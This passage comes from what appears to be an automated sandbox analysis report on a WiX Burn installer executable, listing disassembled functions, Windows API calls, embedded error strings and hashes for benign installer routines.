                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,?,?,0046CCF2,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046CC4C
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 0046CBF6, 0046CC32
                                                                                                                                                          • Failed to copy the canonicalized path., xrefs: 0046CC18
                                                                                                                                                          • Failed to initialize path2utl., xrefs: 0046CC26
                                                                                                                                                          • Failed to canonicalize: %ls, xrefs: 0046CBEA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocCanonicalizeFreeLocalPath
                                                                                                                                                          • String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                          • API String ID: 2828741713-460551743
                                                                                                                                                          • Opcode ID: 9a6720b0c3d28c937c0415e17d28e75ee9696e28a8181a3a37066562a5b58e92
                                                                                                                                                          • Instruction ID: d0f3b0e2a6d96dd83a567042605e7bedba59cb6e1962196c9dc8a47355350d23
                                                                                                                                                          • Opcode Fuzzy Hash: 9a6720b0c3d28c937c0415e17d28e75ee9696e28a8181a3a37066562a5b58e92
                                                                                                                                                          • Instruction Fuzzy Hash: FE113431E80324B7EB311B588C0AFAE3A50DB04B60F018053BD0CBA2D1F6AC9E1096DE
                                                                                                                                                          Function 00407BC3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00407C3E,00407DE7), ref: 00407BDA
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00407BF0
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00407C05
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                          • Opcode ID: e3bbbc9f8d1473d6a6d7317dee48e6a5d08ab297cb70149c2f662b2d0fe83c00
                                                                                                                                                          • Instruction ID: 66e8f7bad9f35f3fd2383447beb7a85de4620c15531912c1d671696bae788255
                                                                                                                                                          • Opcode Fuzzy Hash: e3bbbc9f8d1473d6a6d7317dee48e6a5d08ab297cb70149c2f662b2d0fe83c00
                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0D135F0E2125BAB304E641D54AA7279C4B1535531041BBE405F23D0E73CBC8182DF
                                                                                                                                                          Function 00470269 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 109COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0041D073,?,00000003,?,?), ref: 00470289
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0041D073,?,00000003,?,?), ref: 0047031F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to allocate memory for certificate property.$Failed to get certificate property.$Failed to get size of certificate property.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\certutil.cpp
                                                                                                                                                          • API String ID: 1452528299-2025671064
                                                                                                                                                          • Opcode ID: c109259da9c87386dca63cfed68b21f96018c3085f02ebbaa04ebeec5fba8b79
                                                                                                                                                          • Instruction ID: b7bd13ce72fa66d6ed0891ed14e0c2c9f4472b6d29dffd52ffde98a2026090ce
                                                                                                                                                          • Opcode Fuzzy Hash: c109259da9c87386dca63cfed68b21f96018c3085f02ebbaa04ebeec5fba8b79
                                                                                                                                                          • Instruction Fuzzy Hash: 3D313972A42225BBE7316A518C49FAF2E1CDF11B60F01406ABD08BA2D1E77C8D0081E9
                                                                                                                                                          Function 0046F352 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 80stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to concatenate the dependency key name., xrefs: 0046F416
                                                                                                                                                          • Failed to add the string lengths together., xrefs: 0046F3C9
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F425
                                                                                                                                                          • Failed to get string length of dependency name., xrefs: 0046F3A5
                                                                                                                                                          • Failed to allocate string for dependency registry root., xrefs: 0046F3F1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: Failed to add the string lengths together.$Failed to allocate string for dependency registry root.$Failed to concatenate the dependency key name.$Failed to get string length of dependency name.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 1659193697-486736779
                                                                                                                                                          • Opcode ID: 4b54ea00d4dab682ff6733797825500d53f574e9e666a0f8d73cf9e914afeed0
                                                                                                                                                          • Instruction ID: 4c8e6b0c3825113c7e029879ecffe2cd4d544edc6c586d63fe74b462cd40699b
                                                                                                                                                          • Opcode Fuzzy Hash: 4b54ea00d4dab682ff6733797825500d53f574e9e666a0f8d73cf9e914afeed0
                                                                                                                                                          • Instruction Fuzzy Hash: BC210A32A80215B7DB125F51DC06F9F3F68DB21B61F104272F940BA2D1EBB88A40D79A
                                                                                                                                                          Function 004546AA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,004546A1,004544BC,00451F84), ref: 004546B8
                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004546C6
                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004546DF
                                                                                                                                                          • SetLastError.KERNEL32(00000000,004546A1,004544BC,00451F84), ref: 00454731
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                          • Opcode ID: c463de61136aa9bb0b132086c26b25d0ee55c149947cc9a65bfe5412d4db0b05
                                                                                                                                                          • Instruction ID: c33324891a8b3379342c18d165139fbb0076ca01a92028ef668e10022528cdab
                                                                                                                                                          • Opcode Fuzzy Hash: c463de61136aa9bb0b132086c26b25d0ee55c149947cc9a65bfe5412d4db0b05
                                                                                                                                                          • Instruction Fuzzy Hash: C301DE721082511AA72426B57C86A2B2B95EB827BF720033FF810882FBEF194CC9514D
                                                                                                                                                          Function 0040C013 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(0040951C,WixBundleOriginalSource,?,?,0041E86F,7D89F88B,WixBundleOriginalSource,00000001,0040951C,00000081,0040951C,7D89F88B,0040959C,?,?,7D89F88B), ref: 0040C01F
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0040951C,0040951C,00000000,00000000,?,?,0041E86F,7D89F88B,WixBundleOriginalSource,00000001,0040951C,00000081,0040951C,7D89F88B,0040959C,?), ref: 0040C0A4
                                                                                                                                                          Strings
                                                                                                                                                          • WixBundleOriginalSource, xrefs: 0040C01B
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C094
                                                                                                                                                          • Failed to get value of variable: %ls, xrefs: 0040C059
                                                                                                                                                          • Failed to get value as string for variable: %ls, xrefs: 0040C082
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-2044190524
                                                                                                                                                          • Opcode ID: 8d069cb5f426e93372f5d7f8edf8ce2d8b94ce22bc1966857ed342d13f74b932
                                                                                                                                                          • Instruction ID: 8768e0efef8bc95b31986195676931bfed5daee7a04fbeba4aeba1000fd9fac7
                                                                                                                                                          • Opcode Fuzzy Hash: 8d069cb5f426e93372f5d7f8edf8ce2d8b94ce22bc1966857ed342d13f74b932
                                                                                                                                                          • Instruction Fuzzy Hash: AB01C471A40324FBDF215F94CC4AF8E3A54DB04769F108176FA09BA1D1D3BD9A50D6D8
                                                                                                                                                          Function 0041F0DC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,00000120,00000000,?), ref: 0041F1C2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix\wix\src\burn\engine\dependency.cpp$wininet.dll
                                                                                                                                                          • API String ID: 1825529933-2545241932
                                                                                                                                                          • Opcode ID: 8d5ffd81bb6d4982a8c76fa5e9693b4608e95f8738a060cb54a7be2fcfcedbdf
                                                                                                                                                          • Instruction ID: 239d7c0033bb0054f6e4864bacfd7637bf4dc93857a7332edcac0bcc63b1dc47
                                                                                                                                                          • Opcode Fuzzy Hash: 8d5ffd81bb6d4982a8c76fa5e9693b4608e95f8738a060cb54a7be2fcfcedbdf
                                                                                                                                                          • Instruction Fuzzy Hash: B251AF30A00216EBDB18DF94C884BEFB7B4FB05710F10426BE8199B245C3789996CBD9
                                                                                                                                                          Function 004047AE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 124fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,0041BE04,?,00000000,00477850,00000000,00000000,00000000), ref: 00404857
                                                                                                                                                          • GetLastError.KERNEL32(?,0041BE04,?,00000000,00477850,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource), ref: 004048CC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID: Failed to read from source.$Failed to write to target.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1948546556-2158701991
                                                                                                                                                          • Opcode ID: 32340e7e48adfb6290292430647cce52e777045b388bbed49c22b694dd365a7e
                                                                                                                                                          • Instruction ID: 4259b22e791f4e6835aa5c6e9277fa110e3b1671d00eed8b498a7b4da1fe0ab0
                                                                                                                                                          • Opcode Fuzzy Hash: 32340e7e48adfb6290292430647cce52e777045b388bbed49c22b694dd365a7e
                                                                                                                                                          • Instruction Fuzzy Hash: DF41DEB6E002596BDB21DE148C40BDF77A8EB84741F1184B7FA04F72D1D6789DC48B98
                                                                                                                                                          Function 00449322 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,004777D8,000000FF,00000120,00000000,00000000,000004A0,00000120,00000214,00000000,00000000,00000000,?), ref: 00449375
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix\wix\src\burn\engine\detect.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 1825529933-2217324516
                                                                                                                                                          • Opcode ID: 9ca9fca989913d94840155fdff32e7ebc108a6804d39be58d9eb009006a29146
                                                                                                                                                          • Instruction ID: ccdddb71cfabca4213de994df4c6010c75bf94b040157d04d12c544eb06edaa5
                                                                                                                                                          • Opcode Fuzzy Hash: 9ca9fca989913d94840155fdff32e7ebc108a6804d39be58d9eb009006a29146
                                                                                                                                                          • Instruction Fuzzy Hash: 3841D132A00604BFEB21AFA5CC41F97BBB5FF08314F10457EF585A22A1D378AD619B58
                                                                                                                                                          Function 00439330 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004393E8
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 004393F2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                          • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 2976181284-2073548627
                                                                                                                                                          • Opcode ID: 00a42b1f83d827efc06fe2655a3feb54732ffcb73f0f0533bcdf79ed123cc73d
                                                                                                                                                          • Instruction ID: 13fb2ca316679b4c741c74e5c345571b84c7f5a1944f608d2a225e6d407ec2b0
                                                                                                                                                          • Opcode Fuzzy Hash: 00a42b1f83d827efc06fe2655a3feb54732ffcb73f0f0533bcdf79ed123cc73d
                                                                                                                                                          • Instruction Fuzzy Hash: 0731A571A04216BBDB10DFA9CC85E9AB768FB08724F108166F914A7791D3B8ED11CB94
                                                                                                                                                          Function 004176D3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00424914,00000120), ref: 004177E9
                                                                                                                                                            • Part of subcall function 00467C83: RegQueryValueExW.ADVAPI32(?,?,?,0041775F,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 00467CB6
                                                                                                                                                          Strings
                                                                                                                                                          • Resume, xrefs: 00417752
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 0041772E
                                                                                                                                                          • Failed to open registration key., xrefs: 0041771C
                                                                                                                                                          • Failed to read Resume value., xrefs: 00417780
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                          • String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 3356406503-757597524
                                                                                                                                                          • Opcode ID: 9ebb2c5e9fd69fdd0cce0108d081e7f5481a791fb03447f7704d313eb9ff677e
                                                                                                                                                          • Instruction ID: 3cab745b7414b6a7ae22672de1f51c144b62f215f25fc89b7e36f25cdc735d7a
                                                                                                                                                          • Opcode Fuzzy Hash: 9ebb2c5e9fd69fdd0cce0108d081e7f5481a791fb03447f7704d313eb9ff677e
                                                                                                                                                          • Instruction Fuzzy Hash: BD31D635648215EFD7129E58CC49BEABBB4EF04760F214067F821AB3D0D27CAD80D799
                                                                                                                                                          Function 00465083 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                          • API String ID: 2001391462-494229206
                                                                                                                                                          • Opcode ID: 895a118f4c5df7ade2fa1686f315267a8860816c6542478db69ec910855a8aa7
                                                                                                                                                          • Instruction ID: d54c78b71b6dee5f6f3e41848993a6ce89698ba49e2602bb253f652d0659acb6
                                                                                                                                                          • Opcode Fuzzy Hash: 895a118f4c5df7ade2fa1686f315267a8860816c6542478db69ec910855a8aa7
                                                                                                                                                          • Instruction Fuzzy Hash: 4C31B571A00605BFE710DB58CC86FAB77A8DF06754F11406AF904FB381F3789E009A95
                                                                                                                                                          Function 004716E9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 96registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00020019,?,?,000001D0,00000001,00000120), ref: 004717C4
